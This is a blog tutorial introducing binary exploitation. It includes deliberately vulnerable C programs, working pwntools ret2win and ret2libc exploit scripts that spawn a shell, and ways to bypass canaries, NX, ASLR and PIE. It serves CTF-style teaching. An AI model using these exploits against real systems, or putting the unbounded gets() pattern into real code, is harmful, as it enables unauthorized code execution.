Introduction to Binary Exploitation- Exploiting buffer overflows

This blog is the first in a series dedicated to binary exploitation in which we delve into the nuances of buffer overflow attacks.

Binary Exploitation pwning ctfs buffer overflow ROP

Bhavarth Karmarkar

February 15th 2024.


Binary Exploitation - Part 1

Hello amazing hackers, I am Bhavarth Karmarkar, a security engineer intern at BugBase. Today we are starting a series on a really interesting area of hacking: Binary Exploitation. It is most commonly encountered in CTFs (where it is also called pwn), but what's more fun is that it is also used heavily in kernel exploitation, jailbreaks and RCE CVEs in popular libraries.

Binary exploitation is a fairly advanced topic that involves finding and exploiting vulnerabilities in compiled binary code. By successfully exploiting these vulnerabilities, an attacker can gain a foothold on the system, escalate privileges, bypass protections, and so on.

Binary formats vary across platforms and architectures (for example, ELF on Linux and PE32/PE32+ on Windows), but the process of hacking a binary is fairly similar in all cases.

In this part of the blog series, I am going to talk about some techniques for exploiting buffer overflow vulnerabilities, some of their mitigations, and the bypasses for those mitigations.

Contents of this Blog

Understanding a Binary
Memory Layout of a Process
Buffer Overflow
Exploiting Buffer Overflow
Mitigations Against Buffer Overflow

Understanding a Binary

So, what is a binary anyways?

A binary file (often just called a binary) is a file containing a set of instructions from a specific instruction set. An instruction set is the language of the processor: it is how we tell the processor to execute a certain task. For example, this is what an instruction from the amd64 instruction set looks like:

mov    DWORD PTR [rbp-0x24],eax

The mnemonic is the human-readable name of the instruction. In this case, it is a MOV instruction which, as the name suggests, is used to move data between memory and registers. This is one of the many instructions in the AMD64 instruction set. A binary file is a collection of the encoded forms of such instructions (machine code), generated by a compiler from a higher-level language like C or C++. An opcode is the byte (or bytes) identifying a specific instruction. For example, a MOV from one 64-bit register to another is encoded with the bytes 48 89 (a REX.W prefix followed by the opcode 89), while b8 moves a constant into eax. These bytes only identify the instruction; its operands also need to be encoded after the opcode according to the instruction format.
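To make the encoding concrete, here is a small Python sketch that assembles two forms of MOV by hand. The helper names are hypothetical, and it only covers the eight legacy registers (no r8 to r15), so treat it as an illustration of the byte layout rather than a real assembler.

```python
import struct

# Register numbers used in the ModRM byte (legacy registers only).
REGS = {"rax": 0, "rcx": 1, "rdx": 2, "rbx": 3,
        "rsp": 4, "rbp": 5, "rsi": 6, "rdi": 7}

def mov_r64_r64(dst: str, src: str) -> bytes:
    """Encode `mov dst, src` for two 64-bit registers: REX.W prefix + opcode 89."""
    modrm = 0xC0 | (REGS[src] << 3) | REGS[dst]  # mod=11 selects register-to-register
    return bytes([0x48, 0x89, modrm])

def mov_eax_imm32(value: int) -> bytes:
    """Encode `mov eax, imm32`: opcode b8 followed by a little-endian constant."""
    return b"\xb8" + struct.pack("<I", value)

print(mov_r64_r64("rbp", "rsp").hex(" "))  # mov rbp, rsp -> 48 89 e5
print(mov_eax_imm32(0x2A).hex(" "))        # mov eax, 0x2a -> b8 2a 00 00 00
```

The first line of output, 48 89 e5, is the `mov rbp, rsp` you will find near the start of most functions in a disassembly.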

Here is a whole function written in C, which we will compile into a binary file and disassemble:

#include <stdio.h>

int main() {
    char buff[64];
    puts("Enter Some Content: ");
    gets(buff);  // no bounds check: reads until a newline, however long the input is
}

And here is what the opcodes look like as a sequence of bytes, along with their corresponding assembly instructions.

objdump_main

The first part of a function is called the function prologue and is used to set up the stack frame. The need for this is rooted in the memory layout of a process.

Memory Layout of a Process

memory_layout

Stack

A stack is a Last In First Out data structure which, on x86-64, grows downward in memory, from higher addresses toward lower ones.

The stack is the scratchpad of a process: it stores the local variables of a function and, importantly, the return address that the process needs to jump back to once the current function finishes. The fact that this address is stored on the stack, right next to local buffers, is what makes the Buffer Overflow vulnerability so dangerous.

Heap

The heap is another area of memory in a process, distinct from the stack. While the stack is used for managing the execution flow and storing local variables in a structured manner, the heap is used for dynamic memory allocation. It is used to request memory at run time when the required size is not known ahead of time.

Data

The Data section (.data and .bss) is used to store the global variables of a program.

Text

This section stores the code and is usually the only section of the binary that is mapped as executable, i.e. the data stored in this section can be executed as code.

Buffer Overflow

A Buffer Overflow happens when a program writes more data into a buffer (a storage space that is reserved first and filled in later) than the buffer can hold. The excess content spills out of the buffer and overwrites the adjacent memory locations that come after it.

As discussed earlier, the stack frame of a function stores the return address. When an attacker overflows a buffer, the ultimate aim is control of the Instruction Pointer register (the Program Counter), which stores the address of the instruction to be executed next. If the attacker succeeds in controlling this pointer, they can, depending on the nature of the vulnerability, run unintended pieces of code.
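The idea can be modelled in a few lines of Python. This is only a simulation of a stack frame as a byte array, assuming a 64-byte buffer followed by a saved rbp and the return address; all addresses and helper names are hypothetical.

```python
import struct

BUF_SIZE = 64

def make_frame(return_address: int) -> bytearray:
    """Model a frame: 64-byte buffer, then saved rbp, then the return address."""
    saved_rbp = 0x7FFFFFFFDD40  # hypothetical value
    return bytearray(b"\x00" * BUF_SIZE + struct.pack("<QQ", saved_rbp, return_address))

def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy like gets(): start at the buffer and never check its size."""
    frame[0:len(data)] = data

def saved_return_address(frame: bytearray) -> int:
    """Read the 8-byte return address stored after the buffer and saved rbp."""
    return struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]

frame = make_frame(0x401234)
unchecked_copy(frame, b"A" * 64)             # fits: return address untouched
before = saved_return_address(frame)
unchecked_copy(frame, b"A" * 72 + struct.pack("<Q", 0x401176))  # spills over
after = saved_return_address(frame)
print(hex(before), hex(after))
```

The second copy is 16 bytes too long, so it replaces the saved rbp and the return address with attacker-chosen bytes.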

Exploiting Buffer Overflow

In this section, I will show some popular techniques for exploiting a buffer overflow vulnerability found in a binary file.

Ret2Shellcode/Ret2Win

A shellcode is a small piece of machine code that an attacker injects to make the process execute code of the attacker's choosing. This code can do anything from executing a program or writing to a file to spawning a full-blown shell that connects back to the attacker.

Premise

In the case of a shellcode, NX must be disabled for the binary. With NX enabled, the stack is non-executable, i.e. we will get a SIGSEGV if the Program Counter/Instruction Pointer points to a stack address.
In the case of a shellcode, the system must also have the ASLR (Address Space Layout Randomization) mitigation turned off, or there must be some other way to leak stack addresses, since the attacker has to reliably place the starting address of the shellcode at the location on the stack where the return address to the previous function was stored.
In the case of a win function, the PIE (Position Independent Executable) mitigation must be turned off, so that the address of the win function is known in advance.

Attack Scenario/Example

Suppose that a vulnerable binary contains a function vuln that takes unrestricted user input and stores it in a buffer, and that there is also a win function:

#include <stdio.h>

void win() {
    printf("Congratulations, here is your flag: [REDACTED]");
}

void vuln() {
    char buff[64];
    printf("Enter your payload: ");
    gets(buff);  // unbounded read into a 64-byte buffer
}

int main() {
    // disable buffering of input and output
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    vuln();
}

Compile the code using the command : gcc -fno-stack-protector -no-pie vuln.c -o vuln

We will calculate the offset to the return pointer stored on the stack. To do this, I will set a breakpoint just before the gets() call.

break_gets

Now let's examine the stack.

examine_stack

Now we will try to fill the buffer with 'A's (0x41).

Examining the stack again, we can determine the start of the buffer:

buffer_start

We can then calculate the offset between the location of the return address and the start of our buffer, which turns out to be:

gef➤  p/d 0x7fffffffdd28-0x7fffffffdce0
$2 = 72

So we need to send 72 'A's, followed by the address of the win function or of the shellcode. But shellcode is generally stored on the stack itself, and stack addresses are unpredictable under ASLR, so you need some way to reliably predict or leak a location on the stack that you can later jump to in order to execute the shellcode successfully.
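As a sanity check, the offset and the payload layout can be reproduced with nothing but the Python standard library. The two stack addresses come from the gdb session above; WIN_ADDR is a hypothetical placeholder, since the real value has to be read from the symbol table of your own build.

```python
import struct

RET_SLOT = 0x7FFFFFFFDD28   # where the saved return address lives (from gdb above)
BUF_START = 0x7FFFFFFFDCE0  # start of buff (from gdb above)
WIN_ADDR = 0x401176         # hypothetical; look up the real address of win

offset = RET_SLOT - BUF_START  # 64-byte buffer + 8-byte saved rbp
# struct.pack("<Q", ...) produces the same 8 little-endian bytes as pwntools' p64()
payload = b"A" * offset + struct.pack("<Q", WIN_ADDR)

print(offset, len(payload))  # 72 80
```

The 72 bytes are exactly the 64-byte buffer plus the 8-byte saved rbp that sits between the buffer and the return address.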

Since the binary is compiled with the -no-pie compiler option, its symbols sit at fixed addresses, and we can easily find the address of win by running the objdump -t ./vuln command.

objdump_out

We can write a simple python script using pwntools.

from pwn import *

exe = ELF("./vuln")
io = process("./vuln")

# 72 bytes of padding reach the saved return address, which we replace with win
io.sendlineafter(b"Enter your payload: ", b"A" * 72 + p64(exe.sym.win))
io.interactive()

And that's it! It will overwrite the return pointer with the address of the win function, and when vuln returns, execution jumps to win.

win

Sometimes the attacker uses a NOP sled when they can't reliably predict the exact location of the start of the shellcode in a region of memory. They use the NOP opcode, 0x90, which instructs the CPU to do nothing and move on to the next instruction, thus creating a sliding, sled-like movement that ultimately ends up in the shellcode. This looks like the following:

nop_sled
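A rough way to see why the sled helps is to simulate it. In the sketch below, the "shellcode" is just a placeholder of int3 bytes and the slide function is a hypothetical stand-in for the CPU stepping over NOPs; nothing here is executed as machine code.

```python
NOP = 0x90
SHELLCODE = b"\xcc\xcc\xcc\xcc"  # placeholder bytes (int3), not a real shellcode

def build_sled(sled_len: int, shellcode: bytes) -> bytes:
    """Prefix the shellcode with sled_len NOP bytes."""
    return bytes([NOP]) * sled_len + shellcode

def slide(memory: bytes, landing: int) -> int:
    """Return the offset where execution stops sliding over NOPs."""
    pc = landing
    while pc < len(memory) and memory[pc] == NOP:
        pc += 1
    return pc

region = build_sled(32, SHELLCODE)
for guess in (0, 7, 31):
    print(guess, "->", slide(region, guess))
```

Every guess that lands anywhere inside the 32-byte sled ends at offset 32, the first byte of the shellcode, so the attacker only needs an approximate address.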

ROP

ROP, or Return Oriented Programming, is a technique that relies on short instruction sequences called gadgets that already reside in the binary itself, like

pop rbp
pop rdi
ret

The ret instruction after a set of instructions allows us to form a chain of such gadgets since a ret instruction pops the next address from the stack into the Instruction Pointer register.
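The chaining behaviour can be sketched with a toy interpreter. The gadget and function addresses below are hypothetical, and the model only understands `pop` instructions followed by an implicit `ret`, which is enough to show how the stack drives execution.

```python
# Hypothetical addresses; each gadget lists what runs before its final `ret`.
GADGETS = {
    0x4012A3: ["pop rdi"],
    0x4012A1: ["pop rbp", "pop rdi"],
}
FUNCTIONS = {0x401030: "puts"}

def run_chain(stack):
    """Walk the attacker-controlled stack the way successive `ret`s would."""
    regs, calls = {}, []
    stack = list(stack)
    while stack:
        target = stack.pop(0)         # `ret` pops the next address into rip
        if target in FUNCTIONS:
            calls.append((FUNCTIONS[target], regs.get("rdi")))
            continue                  # the function's own `ret` continues the chain
        for insn in GADGETS[target]:
            reg = insn.split()[1]
            regs[reg] = stack.pop(0)  # `pop reg` consumes the next stack slot
    return regs, calls

regs, calls = run_chain([0x4012A3, 0x404018, 0x401030])
print(calls)
```

Here the three stack slots are read as "run pop rdi; ret", "value for rdi", "address of puts", so puts ends up being called with 0x404018 as its first argument.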

Suppose that we have a binary that is vulnerable to a buffer overflow, but has the NX bit set and PIE disabled. This is a perfect condition for a ROP attack. Let us understand this with an example:

We will be using the same code as above, but this time there is no win function and the NX bit is set, which makes the stack non-executable. First we need to confirm which protections are enabled on the binary, and we will use checksec to find out.

checksec_out

Now we need to find out the ROP gadgets which will help us in our exploit. The most common ROP gadget is:

pop rdi
ret

The reason is that the rdi register holds the first argument to a function in the System V AMD64 calling convention used on Linux. We can use the tool ROPgadget to list all the gadgets available in a binary.

ROPgadget_out

Since we have the pop rdi; ret gadget, we can call functions through the PLT and pass an argument using the stack. This allows us to leak libc addresses and eventually call the system function.

To develop the payload for the exploit, we need to understand what the PLT and the GOT are in a binary. The PLT, or Procedure Linkage Table, is a sort of springboard which relies on the GOT, or Global Offset Table, to jump to the actual dynamically linked function. For example, suppose that a binary uses the function puts from the C standard library. With lazy binding, the dynamic linker does not resolve the function's actual address in libc until the function is first called. So the compiler emits a call to the PLT entry as a placeholder, and the PLT entry contains an instruction that jumps to the resolved function address stored in the GOT.

got_plt

What this means is that calling the PLT entry of a function is effectively equivalent to calling the function. And if the binary is not a Position Independent Executable, then the addresses of the PLT entries for standard library functions are known beforehand. Working with pwntools makes this even easier.
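The PLT and GOT interplay can be mimicked with a dictionary. This is a deliberately simplified model that assumes lazy binding (a binary linked with full RELRO resolves everything at load time instead); the class, the "resolver" marker, and the libc address are all hypothetical.

```python
LIBC = {"puts": 0x7FFFF7E50E50}  # hypothetical resolved address inside libc

class Binary:
    def __init__(self):
        self.got = {"puts": "resolver"}  # GOT slot not resolved yet
        self.resolver_calls = 0

    def call_plt(self, name):
        """PLT stub: jump through the GOT slot, resolving it on first use."""
        if self.got[name] == "resolver":
            self.resolver_calls += 1
            self.got[name] = LIBC[name]  # the dynamic linker patches the GOT
        return self.got[name]            # address that finally executes

binary = Binary()
first = binary.call_plt("puts")
second = binary.call_plt("puts")
print(hex(first), binary.resolver_calls)
```

After the first call, the GOT slot holds the real libc address, which is exactly the value an attacker wants to read out.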

Since the GOT holds the actual addresses of the resolved libc functions, it can be used to leak libc addresses.

rop_chain = b'A' * 72          # padding up to the saved return pointer
rop_chain += pop_rdi_gadget    # this overwrites the return pointer
rop_chain += puts_got_address  # this value gets popped into rdi
rop_chain += puts_plt          # equivalent to calling puts(puts_got_address)
rop_chain += main              # return to main so we can send a second payload

These steps leak a libc address by calling puts with the GOT entry of puts as its argument; that entry contains the address of the libc puts function in memory. We then return to main so that we can make use of the freshly leaked libc address.
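Turning the leaked bytes into a libc base address is simple arithmetic. The sketch below uses only the standard library; the leaked bytes and the offset of puts are hypothetical values chosen for illustration, and parse_leak is a made-up helper name.

```python
import struct

PUTS_OFFSET = 0x80E50                     # hypothetical offset of puts inside libc
raw_line = b"\x50\x0e\xe5\xf7\xff\x7f\n"  # hypothetical bytes printed by puts()

def parse_leak(line: bytes) -> int:
    """puts() stops at the first null byte, so pad the leak back to 8 bytes."""
    if line.endswith(b"\n"):
        line = line[:-1]                  # drop the newline puts() appends
    return struct.unpack("<Q", line.ljust(8, b"\x00"))[0]

leak = parse_leak(raw_line)
libc_base = leak - PUTS_OFFSET            # runtime address minus offset in the file
print(hex(leak), hex(libc_base))
```

A quick sanity check is that the computed base should be page-aligned (its low 12 bits are zero); if it is not, the leak or the libc version is probably wrong.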

The next step is to call the system function with the argument "/bin/sh". Interestingly, the "/bin/sh" string is also stored somewhere in libc itself, and we will use the pwntools library to get its address once we have set the base address of libc. Here is the full code for the exploit:

from pwn import *

libc = ELF("./libc.so.6")
exe = ELF("./vuln")
io = process("./vuln")

main = p64(exe.sym.main)

puts_got = p64(exe.got.puts)
puts_plt = p64(exe.plt.puts)
pop_rdi = p64(0x4012a3)  # pop rdi; ret
ret = p64(0x40101a)      # lone ret
print(f"main: {hex(exe.sym.main)}")
print(f"puts_got: {hex(exe.got.puts)}")
print(f"puts_plt: {hex(exe.plt.puts)}")

# Stage 1: call puts(puts_got) to leak the address of puts, then return to main
io.sendlineafter(b"Enter your payload: ", b'A'*72 + pop_rdi + puts_got + puts_plt + main)

leak = u64(io.recvline().strip(b'\n').ljust(8, b"\x00"))
print(f"leaked {hex(leak)}")
print(f"symbol for puts is {hex(libc.symbols['puts'])}")
libc.address = leak - libc.sym.puts
print(f"libc base is at {hex(libc.address)}")

# Stage 2: with libc rebased, call system("/bin/sh")
system = p64(libc.symbols['system'])
sh_string = next(libc.search(b"/bin/sh"))
print(f"System is at {hex(libc.symbols['system'])}")
print(f"/bin/sh is at {hex(sh_string)}")
sh_string = p64(sh_string)

# a ret is added to address the movaps issue
io.sendlineafter(b"Enter your payload: ", b'A'*72 + ret + pop_rdi + sh_string + system)

io.interactive()

This trick is popularly known as Ret2Libc.

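[ NOTE: Sometimes you will need to add a few rets in the payload to deal with the ubuntu:20.04 MOVAPS issue: libc functions such as system use movaps instructions that crash unless the stack is 16-byte aligned, and each extra ret shifts the stack pointer by 8 bytes. ]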
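The alignment arithmetic behind that note can be checked by hand. The sketch below assumes the return-address slot found earlier in gdb and counts 8 bytes of stack per chain entry; the helper names are hypothetical. After a normal call, rsp at function entry is 8 modulo 16, because the stack was 16-byte aligned before the call pushed the return address.

```python
RET_SLOT = 0x7FFFFFFFDD28  # where vuln's saved return address lives (from gdb above)

def rsp_at_entry(ret_slot: int, chain: list) -> int:
    """rsp when the last chain entry starts executing; every entry takes 8 bytes."""
    return ret_slot + 8 * len(chain)

def aligned_like_a_call(rsp: int) -> bool:
    """True if rsp looks the way it would right after a regular call."""
    return rsp % 16 == 8

without_ret = ["pop rdi; ret", "/bin/sh", "system"]
with_ret = ["ret"] + without_ret

print(aligned_like_a_call(rsp_at_entry(RET_SLOT, without_ret)))  # False
print(aligned_like_a_call(rsp_at_entry(RET_SLOT, with_ret)))     # True
```

In this model, the chain without the extra ret enters system with a misaligned stack, and one additional ret gadget fixes it.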

Mitigations Against Buffer Overflow

1. Stack Canary:

A stack canary is a random 8-byte value starting with a null byte, which is placed on the stack between a function's local variables and the saved return address, so a linear overflow has to overwrite it before it can reach the return pointer. The function checks the canary before returning and aborts the program if it has changed. It is the most common mitigation against buffer overflow attacks. The null byte at the start of the canary terminates any string that runs into it, which prevents accidentally leaking the canary while printing a string stored on the stack.

There are many ways to bypass the Stack Canary:

The most common way to bypass a stack canary is to leak it: overwrite just its leading null byte using a buffer that is later printed, so that the rest of the canary is printed along with it, and then overflow the buffer again, restoring the canary while overwriting past it.
Another technique applies when you have an Out of Bounds Write, for example through incorrect indexing of an array. This can sometimes allow us to 'fly over' the canary so that we never modify it.
One more method for leaking the canary is through format string vulnerabilities, which help us leak data from the stack.
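The difference between a linear overflow and a 'fly-over' write can be shown with a simulated frame. The layout below (64-byte buffer, canary, saved rbp, return address) and all names are assumptions made for illustration.

```python
import os
import struct

BUF, CANARY_OFF, RET_OFF = 64, 64, 80

def new_frame():
    """Build buffer | canary | saved rbp | return address, with a fresh canary."""
    canary = b"\x00" + os.urandom(7)  # the first byte in memory is null
    frame = bytearray(BUF) + canary + struct.pack("<QQ", 0, 0x401234)
    return frame, canary

def canary_intact(frame, canary) -> bool:
    """The check a protected function performs before returning."""
    return bytes(frame[CANARY_OFF:CANARY_OFF + 8]) == canary

# Linear overflow: everything between the buffer and the return address is hit.
frame, canary = new_frame()
frame[0:88] = b"A" * 88
linear_detected = not canary_intact(frame, canary)

# Out-of-bounds indexed write: only the return address slot is touched.
frame, canary = new_frame()
frame[RET_OFF:RET_OFF + 8] = struct.pack("<Q", 0x401176)
flyover_detected = not canary_intact(frame, canary)

print(linear_detected, flyover_detected)  # True False
```

The linear overflow always trips the check, while the targeted write changes the return address without disturbing the canary.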

2. Data Execution Prevention/ Non-Executable Bit

This is a protection mechanism which marks the stack region of the process as non-executable. This means that the process will SEGFAULT if the Instruction Pointer points to a location on the stack and the processor tries to execute an instruction there.

Bypassing this one requires some ROP-fu, where we call the mprotect() syscall, which can set the executable permission on the memory region of the stack and allow us to execute our shellcode without any issues.
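One detail worth knowing before building such a chain is that mprotect() only accepts a page-aligned start address. The helper below is a hypothetical sketch that computes the three arguments for a given target; the shellcode address is made up, and in a ROP chain the resulting values would be loaded into rdi, rsi and rdx.

```python
PAGE_SIZE = 0x1000
PROT_READ, PROT_WRITE, PROT_EXEC = 1, 2, 4  # values from <sys/mman.h> on Linux

def mprotect_args(target: int, length: int):
    """Return (addr, len, prot) covering [target, target+length) with whole pages."""
    start = target & ~(PAGE_SIZE - 1)                           # round down
    end = (target + length + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)  # round up
    return start, end - start, PROT_READ | PROT_WRITE | PROT_EXEC

addr, size, prot = mprotect_args(0x7FFFFFFFDCE0, 200)  # hypothetical shellcode address
print(hex(addr), hex(size), prot)
```

For this example the call would cover one page starting at 0x7fffffffd000 with protection value 7 (read, write and execute).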

3. Address Space Layout Randomisation

This is a kernel protection mechanism that randomizes the base addresses of the stack, libc, and other regions; knowing these in advance greatly eases exploit development. With this mitigation in place, an attacker will almost always need to leak a stack or libc address. You can see how the address at which libc is loaded differs on each run by running the ldd command against any binary.

ldd_aslr_on

You can disable it on your system by running

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

After disabling ASLR, try running ldd again several times and see how the base address of libc stays fixed.

ldd_aslr_off

... to enable it again, run

echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

To bypass ASLR, we need to leak some addresses, for example with the ret2libc trick above, with a format string vulnerability, or with a number of heap exploitation techniques which will be covered in an upcoming part of this series.
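If you want to compare the ldd runs programmatically rather than by eye, a small parser is enough. The two sample lines below are hypothetical stand-ins for real ldd output, and libc_base is a made-up helper name.

```python
import re

def libc_base(ldd_output: str):
    """Pull the load address of libc out of `ldd` output, or None if absent."""
    match = re.search(r"libc\.so\.6 => \S+ \((0x[0-9a-f]+)\)", ldd_output)
    return int(match.group(1), 16) if match else None

# Hypothetical samples of two consecutive runs with ASLR enabled.
run1 = "\tlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1c5e200000)\n"
run2 = "\tlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f8a91a00000)\n"

print(hex(libc_base(run1)), hex(libc_base(run2)))
print(libc_base(run1) != libc_base(run2))
```

With ASLR enabled the two bases differ between runs; with it disabled, the same comparison on real output should report identical addresses.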

4. Position Independent Executable

A Position Independent Executable is loaded at a different base address on each run (when ASLR is enabled), and all the symbols in the binary are referenced as offsets from this base. Below, you can see the difference between the symbol table of a binary compiled normally and that of one compiled with the -no-pie compiler option.

pie_objdump With PIE

![no_pie_objdump](https://bugbase.s3.ap-south-1.amazonaws.com/bugbase-blogs/binexp1/no_pie_objdump.png) Without PIE

As with ASLR, you need to leak some addresses, which in this case would be an address within the range where the binary gets loaded, as seen in the image below.

info_file
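Once a single address inside the binary has been leaked, the rest follows by arithmetic. The offsets and the leaked value below are hypothetical; in practice the offsets come from the symbol table of the PIE binary and the leak comes from the running process.

```python
MAIN_OFFSET = 0x1189          # hypothetical offset of main in the PIE binary
WIN_OFFSET = 0x1169           # hypothetical offset of win in the PIE binary
leaked_main = 0x555555555189  # hypothetical runtime address of main from a leak

pie_base = leaked_main - MAIN_OFFSET  # where the binary was loaded this run
win_runtime = pie_base + WIN_OFFSET   # any other symbol can now be rebased

print(hex(pie_base), hex(win_runtime))
```

This is the same calculation pwntools performs when you assign the base to exe.address, after which exe.sym lookups return runtime addresses.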

Conclusion

In this blog, we learned about some of the techniques for exploiting buffer overflow like ret2win/ret2shellcode, ret2libc, and some common mitigations like Stack Canaries, NX bit, PIE, and ASLR, and their possible bypasses. This blog was a pilot to a series on binary exploitation which will be going into topics such as Windows binary exploitation, heap exploitation, kernel exploitation, and exploiting some complex binaries. If such topics thrill you, stay tuned for the next blog ;)